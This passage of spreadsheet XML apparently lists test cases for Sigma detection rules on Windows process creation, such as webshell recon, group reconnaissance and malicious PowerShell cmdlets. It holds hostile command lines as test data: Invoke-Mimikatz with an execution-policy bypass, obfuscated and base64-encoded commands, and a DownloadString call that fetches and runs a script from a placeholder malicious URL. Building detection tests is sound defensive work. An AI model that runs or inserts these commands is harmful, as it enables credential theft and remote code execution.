    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="n"/>
      <c r="B307" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C307" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D307" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E307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307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I307" s="43" t="n"/>
      <c r="J307" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K307" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="n"/>
      <c r="B308" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C308" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D308" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E308" s="36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308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I308" s="43" t="n"/>
      <c r="J308" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K308" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="n"/>
      <c r="B309" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C309" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D309" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E309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309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I309" s="43" t="n"/>
      <c r="J309" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K309" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="n"/>
      <c r="B310" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C310" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D310" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E310" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I310" s="43" t="n"/>
      <c r="J310" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K310" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="n"/>
      <c r="B311" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C311" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D311" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E311" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I311" s="43" t="n"/>
      <c r="J311" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K311" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="n"/>
      <c r="B312" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C312" s="36" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D312" s="36" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E312" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F312" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G312" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H312" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I312" s="43" t="n"/>
      <c r="J312" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K312" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="n"/>
      <c r="B313" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C313" s="36" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D313" s="36" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E313" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F313" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G313" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H313" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I313" s="43" t="n"/>
      <c r="J313" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K313" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="n"/>
      <c r="B314" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C314" s="36" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D314" s="36" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E314" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODeDcOMmAND QUdULUxvY2FsR3JvdXBtZW50IC1Hcm91cCAiRG9tYWluIEFkbWlucyI=</t>
        </is>
      </c>
      <c r="F314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I314" s="43" t="n"/>
      <c r="J314" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K314" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="n"/>
      <c r="B315" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C315" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D315" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E315" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I315" s="36" t="n"/>
      <c r="J315" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K315" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="43" t="n"/>
      <c r="B316" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C316" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D316" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E316" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I316" s="36" t="n"/>
      <c r="J316" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K316" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="n"/>
      <c r="B317" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C317" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D317" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E317" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I317" s="36" t="n"/>
      <c r="J317" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K317" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="43" t="n"/>
      <c r="B318" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C318" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D318" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E318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318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I318" s="36" t="n"/>
      <c r="J318" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K318" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="43" t="n"/>
      <c r="B319" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C319" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D319" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E319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319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I319" s="43" t="n"/>
      <c r="J319" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K319" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="43" t="n"/>
      <c r="B320" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C320" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D320" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E320" s="36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320" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G320" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H320" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I320" s="36" t="n"/>
      <c r="J320" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K320" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="43" t="n"/>
      <c r="B321" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C321" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D321" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E321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321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I321" s="43" t="n"/>
      <c r="J321" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K321" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="n"/>
      <c r="B322" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C322" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D322" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E322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322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I322" s="43" t="n"/>
      <c r="J322" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K322" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="n"/>
      <c r="B323" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C323" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D323" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E323" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I323" s="43" t="n"/>
      <c r="J323" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K323" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="n"/>
      <c r="B324" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C324" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D324" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E324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324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I324" s="43" t="n"/>
      <c r="J324" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K324" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="43" t="n"/>
      <c r="B325" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C325" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D325" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E325" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I325" s="36" t="n"/>
      <c r="J325" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K325" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="n"/>
      <c r="B326" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C326" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D326" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E326" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I326" s="36" t="n"/>
      <c r="J326" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K326" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="43" t="n"/>
      <c r="B327" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C327" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D327" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E327" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I327" s="36" t="n"/>
      <c r="J327" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K327" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43" t="n"/>
      <c r="B328" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C328" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D328" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E328" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I328" s="43" t="n"/>
      <c r="J328" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K328" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="43" t="n"/>
      <c r="B329" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C329" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D329" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E329" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I329" s="36" t="n"/>
      <c r="J329" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K329" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="43" t="n"/>
      <c r="B330" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C330" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D330" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E330" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I330" s="36" t="n"/>
      <c r="J330" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K330" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="43" t="n"/>
      <c r="B331" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C331" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D331" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E331" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I331" s="43" t="n"/>
      <c r="J331" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K331" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="43" t="n"/>
      <c r="B332" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C332" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D332" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E332" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I332" s="36" t="n"/>
      <c r="J332" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K332" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="43" t="n"/>
      <c r="B333" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C333" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D333" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E333" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="43" t="n"/>
      <c r="J333" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K333" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="43" t="n"/>
      <c r="B334" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C334" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D334" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E334" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I334" s="43" t="n"/>
      <c r="J334" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K334" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="43" t="n"/>
      <c r="B335" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C335" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D335" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E335" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I335" s="36" t="n"/>
      <c r="J335" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K335" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="43" t="n"/>
      <c r="B336" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C336" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D336" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E336" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I336" s="36" t="n"/>
      <c r="J336" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K336" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="43" t="n"/>
      <c r="B337" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C337" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D337" s="36" t="inlineStr">
        <is>
